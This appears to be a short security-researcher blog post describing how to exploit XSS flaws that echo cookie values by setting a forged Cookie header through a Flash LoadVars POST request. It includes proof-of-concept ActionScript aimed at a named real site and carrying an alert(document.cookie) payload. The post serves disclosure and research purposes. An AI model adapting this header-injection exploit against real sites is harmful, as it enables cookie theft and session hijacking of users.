Well, after talking with David Ross about the last post (bypassing content-disposition), I found out that it's exploitation wasn't as easy as it appears since IE has done some updates on the last couple of months.. so well.. sorry about that.
Anyway, I guess it's time to say the world a little way of exploiting XSS vulnerabilities that echoes the value of a cookie.
This is based on majohn trick (setting headers via flash post), and well, I remembered about that when I saw kuza's talk.
This is done via flash:
class defconxss {
static function main(mc) {
var req = new LoadVars();
req.addRequestHeader("Cookie:bblastactivity=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E", " ");
req["1"]="1";
req.send("https://pics.defcon.org/misc.php?action=cookies", "_self", "POST");
}
}
This is a PoC for a XSS at pics.defcon.org you can read more about it here: http://whk.h4ck1ng.net/2007-12.22/xss-en-defconorg/ but it's on spanish.
An important thing to say is that the cookies sent this way are not persistent by default, anyway, some codes make force them to be persistent.
So this works for me with the latest player: http://www.adobe.com/shockwave/download/
Anyway, internet explorer is not vulnerable.. damn..
You can download kuza's talk here: http://outpost.h3q.com/fnord/24c3-torrents/24c3-2212-en-unusual_web_bugs.mp4.torrent
Greetz!!